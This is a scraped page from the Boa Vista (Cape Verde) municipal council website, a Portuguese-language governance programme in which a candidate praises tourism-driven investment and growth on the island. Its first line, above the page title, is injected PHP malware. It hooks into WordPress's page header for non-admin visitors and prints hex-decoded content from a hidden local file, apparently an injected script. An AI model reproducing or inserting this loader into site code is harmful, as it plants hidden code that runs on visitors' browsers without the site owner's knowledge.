if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Programa de Governação - Camara Municipal da Boavista

Programa de Governação

Palavras do Candidato aos Municípes

Nos últimos anos, a ilha da Boa Vista tem conhecido um rápido crescimento impulsionado, sobretudo, pela dinâmica que temos imprimido ao longo dos nossos sucessivos mandatos na Câmara Municipal.
Está à vista de todos os cabo-verdianos os investimentos estruturantes realizados, em todos os sectores de desenvolvimento local.
Hoje, temos um Município e uma ilha pujante, que alavancado pela dinâmica do sector turístico, descobriu as suas forças e potencialidades e nos faz acreditar que esta ilha – da cidade de Sal-Rei ao Rabil, de Estância de Baixo às Povoações do Norte, passando por Bofareira até Povoação Velha – constitui prova evidente que Boa Vista caminha a passos largos para alcançar o desenvolvimento sustentável.
Adoptamos uma estratégia de execução intensiva de investimentos públicos e de atracção de investimentos privados de grande dimensão. Intencionalmente, ousamos mudar o discurso e a visão sobre o desenvolvimento do Município.
Definimos como prioridade a criação de um ambiente de negócios atractivo e, por isso, lançamo-nos numa grande ofensiva para atrair os investidores privados. E fizemo-lo com determinação, com convicção e de forma muito positiva.
Igualmente, para atrair investimentos privados, sobretudo na área do turismo, deliberamos entrar como sócio da SDTI BM, e os resultados dessa decisão são evidentes em vários domínios, nomeadamente os investimentos em Lacacão, para não citar outros no domínio social e da formação.
Sempre acreditamos e agora acreditamos, ainda mais, que era e é possível concretizar o sonho do desenvolvimento de Boa Vista.

Na nossa missão de atrair empresários e homens de negócios obtivemos resultados palpáveis. Soubemos transmitir confiança e tivemos eco junto de grupos económicos nacionais e estrangeiros que, continuamente, vêm realizando projectos de investimentos importantes na Boa Vista, como é o caso do Grupo Tui & Rui que já construíram dois grandes hotéis neste Município. Vários resorts foram construídos. Projectos Imobiliários de qualidade valorizaram novos Bairros da Cidade, entre outros investimentos nos Desportos Náuticos, na Pesca Artesanal e Desportiva, etc. Os projectos concretizados até agora estão aí para provar que esse é o caminho certo. Isso só foi possível graças à estratégia de promoção económica que seguimos na Câmara Municipal da Boa Vista.

O nosso objectivo é transformar a Boa Vista num dos centros económicos mais dinâmicos das ilhas de Cabo Verde.
É com orgulho e muita satisfação que ouvimos pessoas de várias ilhas a tomar “Bubista” como referência em termos de estratégia de desenvolvimento. No último inquérito do INE ficamos a saber que a nossa Ilha já está à frente como maior destino turístico do País. Os dados de 2011 indicam que a Boa Vista acolheu 38,9% de turistas, seguida do Sal com 35,4%. Estamos na frente e assim vamos continuar, porque mais e mais projectos estão em carteira, os quais vão aumentar a oferta de alojamento, vão criar mais riqueza, mais empregos e mais receitas para os cofres do Estado. Só para elucidar, somos uma das ilhas que, nos últimos anos, mais tem contribuído para o PIB de Cabo Verde, através do turismo. É na Boa Vista que a TACV tem as suas maiores receitas através do serviço de Handling. A Alfândega, também, mensalmente envia daqui da Boa Vista para o Tesouro Nacional largos milhares de contos. Dado ao aumento exponencial dos voos para o Aeroporto de Rabil a ASA, também, aumentou as suas receitas extraordinariamente.

Várias empresas de construção civil instalaram-se na Boa Vista, bem como empresas de prestação de serviços de todo o tipo, como Bancos, Seguradoras, Agências de Viagens, Armadores de Cabotagem e de Pesca, etc. Boa Vista tornou-se altamente apetecível para os cabo-verdianos de todas as ilhas e para os estrangeiros de vários países do mundo. É assim que queremos continuar, um Município com uma economia local dinâmica, que oferece oportunidades e mais qualidade de vida aos seus Munícipes e que, também, dá o seu contributo para o desenvolvimento do País.
É por isso que cá estamos, de cabeça erguida e determinados a seguir em frente, rumo ao desenvolvimento da Boa Vista e de Cabo Verde.